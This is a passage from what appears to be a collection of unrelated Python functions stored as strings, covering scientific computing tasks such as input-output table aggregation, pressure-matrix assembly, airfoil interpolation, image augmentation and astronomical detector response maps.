ML_iot_coeff_0, agg_level, rect_level):\r\n \r\n nI_agg = len(list(set(indices['ind'][agg_level])))\r\n nP_agg = len(list(set(indices['prod'][agg_level])))\r\n nW_agg = len(list(set(indices['vadd'][agg_level])))\r\n nM_agg = len(list(set(indices['imp'][agg_level])))\r\n nY_agg = len(list(set(indices['fd'][agg_level])))\r\n nR_agg = len(list(set(indices['exog'][agg_level])))\r\n\r\n nI_rcot = len(list(set(indices['ind'][rect_level])))\r\n nP_rcot = len(list(set(indices['prod'][rect_level])))\r\n nW_rcot = len(list(set(indices['vadd'][rect_level])))\r\n nM_rcot = len(list(set(indices['imp'][rect_level])))\r\n nY_rcot = len(list(set(indices['fd'][rect_level])))\r\n nR_rcot = len(list(set(indices['exog'][rect_level])))\r\n\r\n \r\n ZR_0 = np.zeros((nL,nP_rcot+nI_agg,nP_agg+nI_agg)) # Initialising an empty multi-layer endogenous transactions matrices\r\n WR_0 = np.zeros((nL,nW_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer value added matrices\r\n MR_0 = np.zeros((nL,nM_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer imports matrices\r\n YR_0 = np.zeros((nL,nP_rcot+nI_agg,nY_agg)) # Initialising an empty multi-layer final demand matrices\r\n RR_0 = np.zeros((nL,nR_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer exogenous transactions matrices\r\n\r\n AR_0 = np.zeros((nL,nP_rcot+nI_agg,nP_agg+nI_agg)) # Initialising an empty multi-layer endogenous transactions matrices\r\n wR_0 = np.zeros((nL,nW_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer value added matrices\r\n mR_0 = np.zeros((nL,nM_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer imports matrices\r\n BR_0 = np.zeros((nL,nR_rcot,nP_agg+nI_agg)) # Initialising an empty multi-layer exogenous transactions matrices\r\n\r\n \r\n indInd = indices_agg['ind']\r\n prodInd = indices_agg['prod']\r\n vaddInd = indices_agg['vadd']\r\n impInd = indices_agg['imp']\r\n fdInd = indices_agg['fd']\r\n exogInd = indices_agg['exog']\r\n\r\n zInd = prodInd.append(indInd)\r\n zInd = zInd.swaplevel(0,1)\r\n \r\n\r\n for l in range(nL):\r\n Z = pd.DataFrame(ML_iot_0['Z'][l,:,:], index=zInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n W = pd.DataFrame(ML_iot_0['W'][l,:,:], index=vaddInd, columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n M = pd.DataFrame(ML_iot_0['M'][l,:,:], index=impInd, 
columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n Y = pd.DataFrame(ML_iot_0['Y'][l,:,:], index=zInd, columns=fdInd).groupby(level=rect_level,axis=0).sum().groupby(level=rect_level,axis=1).sum()\r\n\r\n A = pd.DataFrame(ML_iot_coeff_0['A'][l,:,:], index=zInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n w = pd.DataFrame(ML_iot_coeff_0['w'][l,:,:], index=vaddInd, columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n m = pd.DataFrame(ML_iot_coeff_0['m'][l,:,:], index=impInd, columns=zInd).groupby(level=agg_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n \r\n ZR_0[l] = Z.values\r\n WR_0[l] = W.values\r\n MR_0[l] = M.values\r\n YR_0[l] = Y.values\r\n \r\n AR_0[l] = A.values\r\n wR_0[l] = w.values\r\n mR_0[l] = m.values\r\n\r\n \r\n RR_0 = pd.DataFrame(ML_iot_0['R'], index=exogInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n BR_0 = pd.DataFrame(ML_iot_coeff_0['B'], index=exogInd, columns=zInd).groupby(level=rect_level,axis=0).sum().groupby(level=agg_level,axis=1).sum()\r\n \r\n\r\n ML_RCOT_0 = {\r\n 'Z' : ZR_0,\r\n 'W' : WR_0,\r\n 'M' : MR_0,\r\n 'Y' : YR_0,\r\n 'R' : RR_0,\r\n }\r\n\r\n ML_RCOT_coeff_0 = {\r\n 'A' : AR_0,\r\n 'w' : wR_0,\r\n 'm' : mR_0,\r\n 'Y' : YR_0,\r\n 'B' : BR_0,\r\n }\r\n\r\n \r\n indices_RCOT = {\r\n 'prod/ind' : zInd,\r\n 'vadd' : vaddInd,\r\n 'imp' : impInd,\r\n 'fd' : fdInd,\r\n 'exog' : exogInd,\r\n 'headers' : indices['headers']\r\n }\r\n \r\n \r\n return(ML_RCOT_0, ML_RCOT_coeff_0, indices_RCOT)", "def mounting_matrix(self):\n # fmt: off\n count = 0\n for x in range(self.ntheta):\n self.M[count][count] = 1\n self.f[count][0] = self.p_in\n count = count + self.nz - 1\n self.M[count][count] = 1\n self.f[count][0] = self.p_out\n count = count + 1\n count = 0\n for x in range(self.nz - 2):\n self.M[self.ntotal - self.nz + 1 + count][1 + count] = 1\n self.M[self.ntotal - self.nz + 1 + count][self.ntotal - self.nz + 1 + count] = -1\n count = count + 1\n count = 1\n j = 0\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i][self.ntheta - 1])\n self.M[count][self.ntotal - 2 * self.nz + count] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1, j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][self.ntheta - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = self.nz + 1\n for j in range(1, self.ntheta - 1):\n for i in range(1, self.nz - 1):\n a = (1 / self.dtheta ** 2) * (self.c1[i, j - 1])\n self.M[count][count - self.nz] = a\n b = (1 / self.dz ** 2) * (self.c2[i - 1][j])\n self.M[count][count - 1] = b\n c = -((1 / self.dtheta ** 2) * ((self.c1[i][j]) + self.c1[i][j - 1])\n + (1 / self.dz ** 2) * (self.c2[i][j] + self.c2[i - 1][j]))\n self.M[count, count] = c\n d = (1 / self.dz ** 2) * (self.c2[i][j])\n self.M[count][count + 1] = d\n e = (1 / self.dtheta ** 2) * (self.c1[i][j])\n self.M[count][count + self.nz] = e\n count = count + 1\n count = count + 2\n count = 1\n for j in range(self.ntheta - 1):\n for i in range(1, self.nz - 1):\n if j == 0:\n self.f[count][0] = (self.c0w[i][j] - self.c0w[i][self.ntheta - 1]) / self.dtheta\n else:\n self.f[count][0] = (self.c0w[i, j] - self.c0w[i, j 
- 1]) / self.dtheta\n count = count + 1\n count = count + 2\n # fmt: on", "def get_hardwired_speed_weights(self):\n \n phase_shift=self.speed_phase_shift\n \n # row 1 has the weights of speed cells to grid cell 1\n self.W_speed_east=np.zeros_like(self.W_ee) \n self.W_speed_west=np.zeros_like(self.W_ee) \n self.W_speed_north=np.zeros_like(self.W_ee) \n self.W_speed_south=np.zeros_like(self.W_ee) \n\n if self.use_eight_directions is True:\n self.W_speed_north_east=np.zeros_like(self.W_ee) \n self.W_speed_north_west=np.zeros_like(self.W_ee) \n self.W_speed_south_east=np.zeros_like(self.W_ee) \n self.W_speed_south_west=np.zeros_like(self.W_ee) \n\n\n for phase_idx,phase in enumerate(self.gp.phases):\n shifted_north_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(np.pi/2.),self.gp.phases)\n shifted_south_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi/2.),self.gp.phases)\n shifted_east_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(0),self.gp.phases)\n shifted_west_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi),self.gp.phases)\n\n self.W_speed_north[phase_idx,:]=self.W_ee[shifted_north_phase_idx,:]\n self.W_speed_south[phase_idx,:]=self.W_ee[shifted_south_phase_idx,:]\n self.W_speed_east[phase_idx,:]=self.W_ee[shifted_east_phase_idx,:]\n self.W_speed_west[phase_idx,:]=self.W_ee[shifted_west_phase_idx,:] \n \n if self.use_eight_directions is True:\n shifted_north_east_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(np.pi/4),self.gp.phases)\n shifted_north_west_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(np.pi*3/4),self.gp.phases)\n shifted_south_east_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi/4),self.gp.phases)\n shifted_south_west_phase_idx=gl.get_pos_idx(phase+phase_shift*dir_vect(-np.pi*3/4),self.gp.phases)\n \n self.W_speed_north_east[phase_idx,:]=self.W_ee[shifted_north_east_phase_idx,:]\n self.W_speed_north_west[phase_idx,:]=self.W_ee[shifted_north_west_phase_idx,:]\n self.W_speed_south_east[phase_idx,:]=self.W_ee[shifted_south_east_phase_idx,:]\n self.W_speed_south_west[phase_idx,:]=self.W_ee[shifted_south_west_phase_idx,:]", "def DrawBands(self, count):\n value = self.little[0]\n mobile_average = float(sum([float(self.little[i])\n for i in range(len(self.little))])) / float(self.period)\n standard_derivation = sqrt(sum([pow(self.little[i] - mobile_average, 2)\n for i in range(len(self.little))]) / self.period)\n upper_band = mobile_average + (standard_derivation * self.sd_coef)\n lower_band = mobile_average - (standard_derivation * self.sd_coef)\n self.upper.insert(0, upper_band)\n self.lower.insert(0, lower_band)\n if len(self.upper) >= self.period:\n self.upper.pop()\n if len(self.lower) >= self.period:\n self.lower.pop()\n if count >= self.period:\n for i in range(len(self.little) - 1):\n self.canvas.create_line((i * self.incr / 1.725) + self.incr * 4,\n self.height - self.incr * 4 + (self.little[i] - 1) * 5000 - 200,\n (i * self.incr / 1.725) + self.incr * 4 + self.incr / 1.725,\n self.height - self.incr * 4 + (self.little[i + 1] - 1) * 5000 - 200,\n fill = \"#FFFF00\", width = 2)\n for i in range(len(self.upper) - 1):\n self.canvas.create_line((i * self.incr / 1.635) + self.incr * 4,\n self.height - self.incr * 4 + (self.upper[i] - 1) * 5000 - 200,\n (i * self.incr / 1.635) + self.incr * 4 + self.incr / 1.635,\n self.height - self.incr * 4 + (self.upper[i + 1] - 1) * 5000 - 200,\n fill = \"#FF6600\", width = 3)\n self.canvas.create_line((i * self.incr / 1.635) + self.incr * 4,\n self.height - self.incr * 4 + (self.lower[i] 
- 1) * 5000 - 200,\n (i * self.incr / 1.635) + self.incr * 4 + self.incr / 1.635,\n self.height - self.incr * 4 + (self.lower[i + 1] - 1) * 5000 - 200,\n fill = \"#FF0000\", width = 3)", "def __hinterpolate(self):\n \n # Temp. Data holders\n upperint = []\n lowerint = []\n \n # Dont like this, because here we insert points into the rawdata\n # But it creates consisitent results in the interpolation results\n if self.__upper[0][0] != 0: self.__upper.insert(0,(0.,0.))\n if self.__lower[0][0] != 0: self.__lower.insert(0,(0.,0.))\n \n # Create points\n if self.__interpolation_method == \"l\":\n xpointsU = list(map(lambda x:x/float(self.__procPointsCount),range(0,self.__procPointsCount+1)))\n xpointsL = list(map(lambda x:x/float(self.__procPointsCount),range(0,self.__procPointsCount+1)))\n elif self.__interpolation_method == \"p\":\n xpointsU = [x**2/float(self.__procPointsCount)**2 for x in range(self.__procPointsCount+1)]\n xpointsL = [x**2/float(self.__procPointsCount)**2 for x in range(self.__procPointsCount+1)]\n \n # Calculate secants\n uppersec = [(self.__upper[i+1][1]-self.__upper[i][1])/(self.__upper[i+1][0]-self.__upper[i][0]) for i in range(len(self.__upper)-1)]\n lowersec = [(self.__lower[i+1][1]-self.__lower[i][1])/(self.__lower[i+1][0]-self.__lower[i][0]) for i in range(len(self.__lower)-1)]\n \n # Calculate tangents\n uppertan = [(uppersec[k-1]+uppersec[k])/2 for k in range(1,len(uppersec))]\n uppertan.insert(0,uppersec[0])\n uppertan.append(uppersec[-1])\n\n lowertan = [(lowersec[k-1]+lowersec[k])/2 for k in range(1,len(lowersec))]\n lowertan.insert(0,lowersec[0])\n lowertan.append(lowersec[-1])\n \n # Hermite blending functions\n p0 = lambda t: 2*t**3 - 3*t**2 + 1\n m0 = lambda t: t**3 - 2*t**2 + t\n p1 = lambda t: -2*t**3 + 3*t**2\n m1 = lambda t: t**3 - t**2\n \n # Find matching points to improve accuarcy\n matchU = [(i,j) for i in range(len(xpointsU)) for j in range(len(self.__upper)) if xpointsU[i] == self.__upper[j][0]]\n matchL = [(i,j) for i in range(len(xpointsL)) for j in range(len(self.__lower)) if xpointsL[i] == self.__lower[j][0]]\n \n # Reverse match pairs to insure no index errors\n matchU.reverse()\n matchL.reverse()\n\n# print(self.__lower)\n# print(xpointsL)\n # Pop xpoints that dont require interpolation and append the point into the upperint list\n for i in matchU:\n xpointsU.pop(i[0])\n upperint.append(self.__upper[i[1]])\n \n# print(matchL)\n \n # Same process as above but for lower airfoil\n for i in matchL:\n xpointsL.pop(i[0])\n lowerint.append(self.__lower[i[1]])\n \n # Interpolate upper points\n for xp in xpointsU:\n for i in range(len(self.__upper)-1):\n if self.__upper[i][0] < xp < self.__upper[i+1][0]:\n h = self.__upper[i+1][0]-self.__upper[i][0]\n t = (xp - self.__upper[i][0]) / h\n solution = ( p0(t)*self.__upper[i][1] + h*m0(t)*uppertan[i] + p1(t)*self.__upper[i+1][1] + h*m1(t)*uppertan[i+1] )\n upperint.append((xp,solution))\n \n # Interpolate lower points\n for xp in xpointsL:\n for i in range(len(self.__lower)-1):\n if self.__lower[i][0] < xp < self.__lower[i+1][0]:\n h = self.__lower[i+1][0]-self.__lower[i][0]\n t = (xp - self.__lower[i][0]) / h\n solution = ( p0(t)*self.__lower[i][1] + h*m0(t)*lowertan[i] + p1(t)*self.__lower[i+1][1] + h*m1(t)*lowertan[i+1] )\n lowerint.append((xp,solution))\n \n # Sort the points to keep the correct sequence\n upperint.sort(key=lambda x:x[0], reverse=True)\n lowerint.sort(key=lambda x:x[0])\n \n # Do checks to insure no duplicates\n if upperint[0][0] != 1.0: upperint.insert(0,(1.0,0.0))\n if 
upperint[-1][0] != 0.0: upperint.append((0.0,0.0))\n if lowerint[0][0] == 0.0: lowerint.pop(0)\n if lowerint[-1][0] != 1.0: lowerint.append((1.0,0.0))\n\n self.__ProcPoints = upperint + lowerint", "def stairs_4(taille):\n a = np.arange(taille)\n b = np.hstack((a, taille, np.flip(a)))\n return b + b.reshape(-1, 1) # ou b + b[:, np.newaxis]", "def augment_stretch(img, mask, scale_range):\n\n tr_x1 = scale_range * np.random.uniform()\n tr_y1 = scale_range * np.random.uniform()\n p1 = (tr_x1, tr_y1)\n tr_x2 = scale_range * np.random.uniform()\n tr_y2 = scale_range * np.random.uniform()\n p2 = (img.shape[0] - tr_x2, tr_y1)\n\n p3 = (img.shape[0] - tr_x2, img.shape[1] - tr_y2)\n p4 = (tr_x1, img.shape[1] - tr_y2)\n\n pts1 = np.float32([[p1[0], p1[1]],\n [p2[0], p2[1]],\n [p3[0], p3[1]],\n [p4[0], p4[1]]])\n pts2 = np.float32([[0, 0],\n [img.shape[1], 0],\n [img.shape[1], img.shape[0]],\n [0, img.shape[0]]]\n )\n\n M = cv2.getPerspectiveTransform(pts1, pts2)\n img = cv2.warpPerspective(img, M, (img.shape[0], img.shape[1]))\n img = np.array(img, dtype=np.uint8)\n if mask is not None:\n mask = cv2.warpPerspective(mask, M, (mask.shape[0], mask.shape[1]))\n mask = np.array(mask, dtype=np.uint8)\n\n return img, mask", "def _propagate_A(self):\n A_roots = np.roots(self.A)\n A_roots_norm = [r if np.abs(r) < 1 else 1/np.conj(r) for r in A_roots]\n A_poly = np.poly(A_roots_norm)\n self.alpha_g = -A_poly[1:]\n self.A = np.concatenate([[1], -self.alpha_g])\n\n self.rev_A = self.A[::-1]\n\n self.pie = np.dot(self.M_mu, self.rev_A)\n self.pi = self.pie*self.e\n self.p = self.pi*self.d\n\n\n M_R = np.lib.stride_tricks.as_strided(self.R_pad,\n shape=[self.L_h, self.L_h, self.P+1],\n strides=[self.R_pad.strides[0], self.R_pad.strides[1], self.R_pad.strides[0]])\n self.half_pie_var = np.dot(M_R, self.rev_A)\n self.half_pie_var_pad = np.pad(self.half_pie_var, [(0, 0), (self.P, 0)], 'constant')\n self.M_half_pie_var_pad = np.lib.stride_tricks.as_strided(self.half_pie_var_pad,\n shape=[self.L_h, self.P+1],\n strides=[self.half_pie_var_pad.strides[0]+self.half_pie_var_pad.strides[1], self.half_pie_var_pad.strides[1]])\n\n self.pie_var = np.dot(self.M_half_pie_var_pad, self.rev_A)", "def normalize_mirage(wn, data, breaks=[(922,926), (1202,1206), (1448,1452)],\n endpoints=6, slopefactor=.5):\n data = data.copy()\n if not len(data):\n return data, None\n flipwn = wn[0] > wn[-1]\n if flipwn:\n data = data[:, ::-1]\n wn = wn[::-1]\n breaks = find_wn_ranges(wn, np.array(breaks))\n cuts = np.concatenate(([0], breaks.flatten(), [len(wn)])).reshape((-1, 2))\n\n # Straight baseline of each segment. 
shape=(ncuts, 2, nspectra)\n scale = np.zeros(cuts.shape + (len(data),))\n # Overall level in each segment\n dsum = np.zeros(len(cuts))\n slopes = np.zeros(cuts.shape)\n cutpoints = np.zeros(cuts.shape)\n\n def linreg(x, y):\n xm = x.mean()\n ym = y.mean(1)\n rx = x - xm\n s = (rx * (y.T - ym).T).sum(1) / (rx * rx).sum()\n return xm, ym, s\n\n for i in range(len(cuts)):\n cb = cuts[i][0]\n ce = cuts[i][1]\n cwidth = min(endpoints, (ce - cb) // 2)\n\n wb = linreg(wn[cb:cb+cwidth], np.abs(data[:, cb:cb+cwidth]))\n we = linreg(wn[ce-cwidth:ce], np.abs(data[:, ce-cwidth:ce]))\n\n cutpoints[i, :] = [wb[0], we[0]]\n # sc = np.maximum([wb[1], we[1]], 1)\n sc = [wb[1], we[1]]\n scale[i,:,:] = sc\n slopes[i, :] = np.array([wb[2], we[2]]).mean(1)\n # need to handle negative values here!\n # dsum[i] = np.abs(data[:, cb:ce]).sum()\n dsum[i] = np.maximum(data[:, cb:ce], 0).sum()\n # Mean level of all spectra in each of the cut points\n means = scale.mean(2)\n # Make the mean levels identical on both sides of the cuts\n for i in range(len(means)-1):\n mm = min(means[i][1], means[i+1][0])\n ds = (slopes[i+1, 0] + slopes[i, 1]) / mm * (\n wn[cuts[i+1, 0]] - wn[cuts[i, 1]]) * slopefactor\n ds = max(-.5, min(.5, ds))\n means[i][1] = mm * (1 - ds)\n means[i+1][0] = mm * (1 + ds)\n # print('means', means)\n scale = (scale.T / means.T).T\n weights = dsum / dsum.mean()\n scale = scale / ((scale.min(1).T * weights).mean(1))\n # scale = scale / ((scale.mean(1).T * weights).mean(1))\n\n for i in range(len(cuts)):\n cb = cuts[i][0]\n ce = cuts[i][1]\n data[:, cb:ce] /= np.linspace(scale[i][0], scale[i][1], ce-cb, axis=-1)\n if i:\n pce = cuts[i-1][1]\n data[:, pce:cb] = np.linspace(data[:, pce-1], data[:, cb], cb-pce+1,\n endpoint=False, axis=-1)[:,1:]\n scale = scale.reshape((-1, len(data))).T\n if flipwn:\n data = data[:,::-1]\n return data, scale", "def create_region_w_spacing (tuple_top_L, tuple_bottom_R):\n\n spacing = int(input ('How many well spaces do you want between each spot? '))\n\n\n #get the plate column numbers from the plate class\n columns = plate1536.columns\n #get the plate rows from the plate class\n rows = plate1536.rows\n\n ###Begin creating list of columns to use###\n\n #initialize and use next\n curr_col_idx = columns.index(int(tuple_top_L[1]))\n\n #set left most column to use as the column given by user in top_left\n col_idxs_to_shoot = [curr_col_idx]\n\n #loop checks the NEXT column that will be produced by moving right\n #by (spacing + 1). If that is beyond the right-most border set by\n #the well region definitions, then it will stop, containing all\n #column choices within the left and right bounds\n while (curr_col_idx + spacing + 1) <= columns.index(int(tuple_bottom_R[1])):\n\n curr_col_idx += (spacing + 1)\n\n col_idxs_to_shoot.append(curr_col_idx)\n\n ###The list of indices in plate1536.columns to use is now set###\n\n\n ###Begin creating list of rows to use###\n\n #initialize and use next\n curr_row_idx = rows.index(tuple_top_L[0])\n\n #set top most row to use as the row given by user in top_left\n row_idxs_to_shoot = [curr_row_idx]\n\n #loop checks the NEXT row that will be produced by moving down\n #by (spacing + 1). 
If that is beyond the bottom-most border set by\n #the well region definitions, then it will stop, containing all\n #row choices within the top and bottom bounds\n while (curr_row_idx + spacing + 1) <= rows.index(tuple_bottom_R[0]):\n\n curr_row_idx += (spacing + 1)\n\n row_idxs_to_shoot.append(curr_row_idx)\n\n ###The list of indices in plate1536.rows to use is now set###\n\n\n #get all the columns you want to use as STRINGS\n col_strs = []\n for i in col_idxs_to_shoot:\n col_strs += [ str(plate1536.columns[i]) ] #have to have extra list brackets to avoid python interpreting a string 'FFF' as\n #a list ['F', 'F', 'F'] and adding 3 items instead of 'FFF'\n\n #get all the rows you want to use as STRINGS\n row_strs = []\n for i in row_idxs_to_shoot:\n row_strs += [ plate1536.row_dict[i] ]#have to have extra list brackets to avoid python interpreting a string 'FFF' as\n #a list ['F', 'F', 'F'] and adding 3 items instead of 'FFF'\n\n\n print(\"This region has {} rows (letters), {} columns (#'s) per row. That's a total of {} spots\".format(len(row_strs), len(col_strs), len(row_strs) * len(col_strs)))\n\n return row_strs, col_strs", "def make_steer_frs(dims, numlevels, numorientations, bandwidth):\n \n result = []\n bands=[]\n p = numorientations-1\n const = math.sqrt(float(math.pow(2,(2*p))*math.pow(math.factorial(p),2)) / float(math.factorial(2*p)*(p+1)))\n f1 = freqspace(dims[0])\n f2 = freqspace(dims[1])\n wx, wy = np.meshgrid(f1, f2)\n size = wx.shape\n r = np.sqrt(wx**2 + wy**2)\n theta = np.arctan2(wy, wx) \n \n bands = np.full((numlevels, numorientations, dims[0], dims[1]), const*1j)\n for level in range(numlevels):\n for orientation in range(numorientations):\n theta_offset = orientation * np.pi / numorientations\n ctrfreq = pi / math.pow(2, (level+1)*bandwidth)\n band = np.cos(theta - theta_offset)**p * log_raised_cos(r, ctrfreq, bandwidth)\n bands[level,orientation,:,:] *= band\n \n hi = log_raised_coshi(r, pi / math.pow(2, bandwidth), bandwidth)\n\n lo = log_raised_coslo(r, pi / math.pow(2, bandwidth * numlevels), bandwidth)\n \n result.append(hi)\n result.append(bands)\n result.append(lo)\n return result", "def _lathe(self, path, sides=12, rise=0.0, loops=1.0):\r\n self.sides = sides\r\n\r\n s = len(path)\r\n rl = int(self.sides * loops)\r\n\r\n pn = 0\r\n pp = 0\r\n tcx = 1.0 / self.sides\r\n pr = (pi / self.sides) * 2.0\r\n rdiv = rise / rl\r\n\r\n # Find largest and smallest y of the path used for stretching the texture\r\n miny = path[0][1]\r\n maxy = path[s-1][1]\r\n for p in range(s):\r\n if path[p][1] < miny:\r\n miny = path[p][1]\r\n if path[p][1] > maxy:\r\n maxy = path[p][1]\r\n\r\n verts = []\r\n norms = []\r\n idx = []\r\n tex_coords = []\r\n\r\n opx = path[0][0]\r\n opy = path[0][1]\r\n\r\n for p in range(s):\r\n\r\n px = path[p][0] * 1.0\r\n py = path[p][1] * 1.0\r\n\r\n tcy = 1.0 - ((py - miny) / (maxy - miny))\r\n\r\n # Normalized 2D vector between path points\r\n dx, dy = Utility.vec_normal(Utility.vec_sub((px, py), (opx, opy)))\r\n\r\n for r in range (0, rl):\r\n sinr = sin(pr * r)\r\n cosr = cos(pr * r)\r\n verts.append((px * sinr, py, px * cosr))\r\n norms.append((-sinr * dy, dx, -cosr * dy))\r\n tex_coords.append((1.0 - tcx * r, tcy))\r\n py += rdiv\r\n\r\n # Last path profile (tidies texture coords).\r\n verts.append((0, py, px))\r\n norms.append((0, dx, -dy))\r\n tex_coords.append((0, tcy))\r\n\r\n if p < s - 1:\r\n pn += (rl + 1)\r\n for r in range(rl):\r\n idx.append((pp + r + 1, pp + r, pn + r))\r\n idx.append((pn + r, pn + r + 1, pp + r + 1))\r\n pp += (rl 
+ 1)\r\n\r\n opx = px\r\n opy = py\r\n\r\n return Buffer(self, verts, tex_coords, idx, norms)", "def relTrace(mat, spinorsize):\n\n top = mat[:spinorsize, :spinorsize]\n bottom = mat[spinorsize:, spinorsize:]\n return 2*(top+bottom)", "def make_stair(nstep,treadDept,riserHeight,landingLength,stepWidth,n):\n\tstep = MKPOL([[[0,0],[0,riserHeight],[2*treadDept,riserHeight], [treadDept,0]],[[1,2,3,4]],1])\n\tstep1 = MKPOL([[[0,0],[0,riserHeight],[treadDept,2*riserHeight], [treadDept,riserHeight]],[[1,2,3,4]],1])\n\tstep = PROD([QUOTE([stepWidth]),step])\n\tstep = TEXTURE(\"texture/Liptus.jpg\")(step)\n\thandrailTop = PROD([QUOTE([stepWidth/15.0]),step1])\n\thandrail = CIRCLE(stepWidth/30.0)([20,20])\n\n\thandrail = PROD([QUOTE([1]),handrail])\n\n\thandrail = R([1,3])(PI/2)(handrail)\n\thandrail = T([1,2,3])([stepWidth-(stepWidth/30.0),treadDept/2,riserHeight])(handrail)\n\thandrail = COLOR(BLACK)(handrail)\n\tstep = STRUCT([step,handrail])\n\thandrailTop = R([2,3])(PI)(handrailTop)\n\thandrailTop = T([1,2,3])([stepWidth-(stepWidth/15.0),treadDept,1+2*riserHeight])(handrailTop)\n\thandrailTop = TEXTURE(\"texture/Liptus.jpg\")(handrailTop)\n\tstep = STRUCT([step,handrailTop])\n\tstair = [step]\n\tif n == 0:\n\t\tstair = []\n\t\"\"\" realization total step \"\"\"\n\tfor i in range(nstep):\n\t\tstep = T([2,3])([treadDept,riserHeight])(step)\n\t\tstair.append(step)\n\tfinalStep = T([2,3])([(treadDept*(nstep+1)),(riserHeight*(nstep))])(CUBOID([stepWidth,landingLength,riserHeight]))\n\tfinalStep = TEXTURE(\"texture/Liptus.jpg\")(finalStep)\n\tstair.append(finalStep)\n\treturn STRUCT(stair)", "def high_level(low_scores, query, template_length):\n h_mat = prog_dynam_matrix(list(range(template_length)), query)\n h_mat.create_content()\n h_mat.fill_high(low_scores)\n h_mat.show()\n h_mat.optimal_path()", "def align(): # open EH and fast shutter\n\t#marAuxiliary.closeMarShield()\n\td2in()\n\td3in()\n\tsh('o')", "def major_loop(self):\r\n\r\n upper_curve = self.shape[0]-1\r\n upper_curve_length = np.sum(self.h[upper_curve] >= self.hr[upper_curve, 0])\r\n h = np.empty(2*(self.shape[0]+upper_curve_length-1)-1)*0\r\n hr = np.empty(2*(self.shape[0]+upper_curve_length-1)-1)*0\r\n m = np.empty(2*(self.shape[0]+upper_curve_length-1)-1)*0\r\n\r\n for i in range(upper_curve_length-1):\r\n pt_index = self.shape[1]-1-i\r\n h[i] = self.h[upper_curve, pt_index]\r\n hr[i] = self.hr[upper_curve, pt_index]\r\n m[i] = self.m[upper_curve, pt_index]\r\n for i in range(self.shape[0]):\r\n forc_index = self.shape[0]-1-i\r\n major_loop_index = upper_curve_length-1+i\r\n h[major_loop_index] = self.hr[forc_index, 0]\r\n hr[major_loop_index] = self.hr[forc_index, 0]\r\n m[major_loop_index] = self.m[forc_index, self.h[forc_index] >= self.hr[forc_index, 0]][0]\r\n\r\n h[self.shape[0]+upper_curve_length-2:] = self.h[0, self.h[0] >= self.hr[0, 0]]\r\n hr[self.shape[0]+upper_curve_length-2:] = self.hr[0, self.h[0] >= self.hr[0, 0]]\r\n m[self.shape[0]+upper_curve_length-2:] = self.m[0, self.h[0] >= self.hr[0, 0]]\r\n\r\n return h, hr, m", "def rrhr(band,skypos,tranges,skyrange,width=False,height=False,stepsz=1.,\n\t\t verbose=0,calpath='../cal/',tscale=1000.,response=True,hdu=False,\n\t\t retries=20):\n\timsz = gxt.deg2pix(skypos,skyrange)\n\t# TODO the if width / height\n\n\tflat = get_fits_data(flat_filename(band,calpath),verbose=verbose)\n\tflatinfo = get_fits_header(flat_filename(band,calpath))\n\tnpixx,npixy \t= flat.shape\n\tfltsz \t\t= flat.shape\n\tpixsz = flatinfo['CDELT2']\n\tdetsize = 1.25\n\n\t# Rotate the flat into the 
correct orientation to start.\n\tflat = np.flipud(np.rot90(flat))\n\n\t# NOTE: This upsample interpolation is done _last_ in the canonical\n\t#\tpipeline as part of the poissonbg.c routine.\n\t# \tThe interpolation function is \"congrid\" in the same file.\n\t# TODO: Should this be first order interpolation? (i.e. bilinear)\n\thrflat = scipy.ndimage.interpolation.zoom(flat,4.,order=0,prefilter=False)\n\timg = np.zeros(hrflat.shape)[\n\t\t\t\thrflat.shape[0]/2.-imsz[0]/2.:hrflat.shape[0]/2.+imsz[0]/2.,\n\t\t\t\thrflat.shape[1]/2.-imsz[1]/2.:hrflat.shape[1]/2+imsz[1]/2.]\n\n\tfor trange in tranges:\n\t\tt0,t1=trange\n\t\tentries = gQuery.getArray(gQuery.aspect(t0,t1),retries=retries)\n\t\tn = len(entries)\n\n\t\tasptime = np.float64(np.array(entries)[:,2])/tscale\n\t\taspra = np.float32(np.array(entries)[:,3])\n\t\taspdec = np.float32(np.array(entries)[:,4])\n\t\tasptwist= np.float32(np.array(entries)[:,5])\n\t\taspflags= np.float32(np.array(entries)[:,6])\n\t\tasptwist= np.float32(np.array(entries)[:,9])\n\t\taspra0 = np.zeros(n)+skypos[0]\n\t\taspdec0 = np.zeros(n)+skypos[1]\n\n\t\txi_vec, eta_vec = gnomonic.gnomfwd_simple(\n\t\t\t\t\t\t\taspra,aspdec,aspra0,aspdec0,-asptwist,1.0/36000.,0.)\n\n\t\tcol = 4.*( ((( xi_vec/36000.)/(detsize/2.)*(detsize/(fltsz[0]*pixsz)) + 1.)/2. * fltsz[0]) - (fltsz[0]/2.) )\n\t\trow = 4.*( (((eta_vec/36000.)/(detsize/2.)*(detsize/(fltsz[1]*pixsz)) + 